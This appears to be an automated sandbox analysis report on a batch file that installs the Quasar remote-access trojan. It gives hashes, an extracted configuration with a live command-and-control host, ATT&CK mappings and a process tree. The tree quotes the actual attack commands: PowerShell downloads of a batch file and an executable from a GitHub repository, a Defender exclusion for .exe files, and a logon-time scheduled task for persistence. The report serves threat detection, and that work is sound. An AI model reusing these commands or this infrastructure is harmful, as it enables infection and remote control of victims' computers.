quasar | 900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4

General

Target

main4.bat
Size

17KB
MD5

d2c79d02019fe6507207e4d57360c2d0
SHA1

58c6e205d730b3cdb1186d9c8618c891e6ddbcde
SHA256

900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4
SHA512

20b38b3b3827c23df5a7c0fdce51524c6f4dc2192b139abef8156f69a25b263f1c5ce502cbd328a056d01396e83a6338e836a55f46a15ce7567313ad82549610
SSDEEP

192:p3U9MgR/KWzBkRIKxZnB2Gl/631wAZ/vhAaiU74/s7HKwSRBPJyU4dWfehLp/rh:C9Mk/p9kRIVHrEsvSRBPJy7Wfezh

Score

10^/10

quasar bot defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes

encryption_key
E83D6FC31962786DAEA703F111D2381786DF06CA
install_name
Modification1.5.14.12.exe
log_directory
Logs
reconnect_delay
3126
startup_key
explorer.dll
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe	family_quasar
behavioral2/memory/5100-49-0x0000000000980000-0x0000000000CA4000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

7 808 powershell.exe
13 2408 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2708 powershell.exe
808 powershell.exe
2408 powershell.exe
Downloads MZ/PE file

flow	pid	process
7	808	powershell.exe
13	2408	powershell.exe

pid	process
2708	powershell.exe
808	powershell.exe
2408	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Modification1.5.14.12.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Modification1.5.14.12.exe

Executes dropped EXE 2 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

pid process

5100 Modification11910275.exe
1040 Modification1.5.14.12.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 raw.githubusercontent.com
7 raw.githubusercontent.com
13 raw.githubusercontent.com

pid	process
5100	Modification11910275.exe
1040	Modification1.5.14.12.exe

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
13	raw.githubusercontent.com

Drops file in System32 directory 5 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

description	ioc	process
File created	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification1.5.14.12.exe
File opened for modification	C:\Windows\system32\SubDir	Modification1.5.14.12.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
defense_evasion

Ignore Process Interrupts
T1564.011

Processes:

powershell.exe

pid process

4492 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

1592 PING.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1592 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

4904 schtasks.exe
2416 schtasks.exe

pid	process
4492	powershell.exe

pid	process
1592	PING.EXE

pid	process
1592	PING.EXE

pid	process
4904	schtasks.exe
2416	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
808	powershell.exe
808	powershell.exe
2708	powershell.exe
2708	powershell.exe
2408	powershell.exe
2408	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process
Token: SeDebugPrivilege	808	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	5100	Modification11910275.exe
Token: SeDebugPrivilege	1040	Modification1.5.14.12.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Modification1.5.14.12.exe

pid process

1040 Modification1.5.14.12.exe

pid	process
1040	Modification1.5.14.12.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

cmd.execmd.exeModification11910275.exeModification1.5.14.12.execmd.exe

description	pid	process	target process
PID 1676 wrote to memory of 808	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 808	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 2844	1676	cmd.exe	cmd.exe
PID 1676 wrote to memory of 2844	1676	cmd.exe	cmd.exe
PID 2844 wrote to memory of 3836	2844	cmd.exe	cacls.exe
PID 2844 wrote to memory of 3836	2844	cmd.exe	cacls.exe
PID 2844 wrote to memory of 2708	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 2708	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 2408	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 2408	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 5100	2844	cmd.exe	Modification11910275.exe
PID 2844 wrote to memory of 5100	2844	cmd.exe	Modification11910275.exe
PID 2844 wrote to memory of 4492	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 4492	2844	cmd.exe	powershell.exe
PID 5100 wrote to memory of 4904	5100	Modification11910275.exe	schtasks.exe
PID 5100 wrote to memory of 4904	5100	Modification11910275.exe	schtasks.exe
PID 5100 wrote to memory of 1040	5100	Modification11910275.exe	Modification1.5.14.12.exe
PID 5100 wrote to memory of 1040	5100	Modification11910275.exe	Modification1.5.14.12.exe
PID 1040 wrote to memory of 2416	1040	Modification1.5.14.12.exe	schtasks.exe
PID 1040 wrote to memory of 2416	1040	Modification1.5.14.12.exe	schtasks.exe
PID 1040 wrote to memory of 2040	1040	Modification1.5.14.12.exe	schtasks.exe
PID 1040 wrote to memory of 2040	1040	Modification1.5.14.12.exe	schtasks.exe
PID 1040 wrote to memory of 3928	1040	Modification1.5.14.12.exe	cmd.exe
PID 1040 wrote to memory of 3928	1040	Modification1.5.14.12.exe	cmd.exe
PID 3928 wrote to memory of 1032	3928	cmd.exe	chcp.com
PID 3928 wrote to memory of 1032	3928	cmd.exe	chcp.com
PID 3928 wrote to memory of 1592	3928	cmd.exe	PING.EXE
PID 3928 wrote to memory of 1592	3928	cmd.exe	PING.EXE

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main4.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K installer.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:3836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Set-MpPreference -ExclusionExtension exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- - C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
    Modification11910275.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4904
  - - C:\Windows\system32\SubDir\Modification1.5.14.12.exe
      "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1040
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2416
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /delete /tn "explorer.dll" /f
        5⤵
        
        PID:2040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vxCpEzj1DTEP.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3928
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1032
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-Process cmd -ErrorAction SilentlyContinue | ForEach-Object { $_.Kill() }"
    3⤵
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Hide Artifacts

1

T1564

Ignore Process Interrupts

1

T1564.011

Credential Access

Discovery

Query Registry

2

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f4cd59fec6cf54c85fc53e911914bf82

SHA1
50c1bf0969af6099d4b602a1d923a9b693a9b9ff

SHA256
70329406d55a7f671e2c30943772bfde19ceb53f7a402222aa0f74669f741f17

SHA512
5cfc2de8d95b1670570908c65389391f107d0f023f8a92412f001bb61982301e3405b692390c502b3f302df907fa1231cd056863cc9151dbbdb59c579858d5dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fdb09774e871dcca178eed9595bc18b3

SHA1
403652d403c0e8c56151d4c57106c0f3f28b990a

SHA256
213c2c66836eb6177c7b31ebc4df6b2bbc7594ae047fa7ccc753c9cecea3e51c

SHA512
ca49edfee48dccb93bccb4ebccf90171b6424f81def5808d895f949b32d03f12d1e55858bad6c13d8ef7f8b771ad94c2a816fab85f02a63e115f34e4861aa8a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe

Filesize
3.1MB

MD5
fa9b1524e725c4a251d07007f15fa947

SHA1
5c023619d8180b611acb544fa1cd8bd31de9e61c

SHA256
0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec

SHA512
dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5rvcx5jv.t1k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\installer.bat

Filesize
1KB

MD5
43bd9a829d434583f1c14da28dca72f6

SHA1
8fac8d694f4c15d42458bdc5540e0547cb88c83c

SHA256
be6d97cbf700b60bb57bf24889af41c0e3e4d3c70800bc164ef71a0608beb6df

SHA512
2bbb73cf8c2a6d0e61ec58b2a125240daf73c87742f377fc2aede5ce24e11f492044b47c98918168148c632b2c4f3f058feef45479265dd51951aac8ceb585da

Download Submit
C:\Users\Admin\AppData\Local\Temp\vxCpEzj1DTEP.bat

Filesize
215B

MD5
d3cd9a03f439447aed1f6fe2b646d228

SHA1
eec581208e003c2e4d7711390af74dea53f8f816

SHA256
e9981e16d5a139827928c4d8fbaf842f71e6e68296c2e042d085f059c3242efc

SHA512
f75db2247d88b97edd9e55ce974e855f4aae1fa2cd2c587480bdbf83a02e0c71c8a8c6cc8bae9c9aa495b6f6bd4a3c0efdd8ddc3dad92971e5fbc5b9951ab18c

Download Submit
memory/808-16-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/808-10-0x000001FE9AC60000-0x000001FE9AC82000-memory.dmp

Filesize
136KB

Download
memory/808-0-0x00007FF8E8383000-0x00007FF8E8385000-memory.dmp

Filesize
8KB

Download
memory/808-12-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/808-11-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/1040-67-0x000000001C470000-0x000000001C4C0000-memory.dmp

Filesize
320KB

Download
memory/1040-72-0x000000001CDC0000-0x000000001CDFC000-memory.dmp

Filesize
240KB

Download
memory/1040-71-0x000000001C540000-0x000000001C552000-memory.dmp

Filesize
72KB

Download
memory/1040-68-0x000000001C580000-0x000000001C632000-memory.dmp

Filesize
712KB

Download
memory/2708-33-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/2708-29-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/2708-31-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/2708-19-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/5100-49-0x0000000000980000-0x0000000000CA4000-memory.dmp

Filesize
3.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads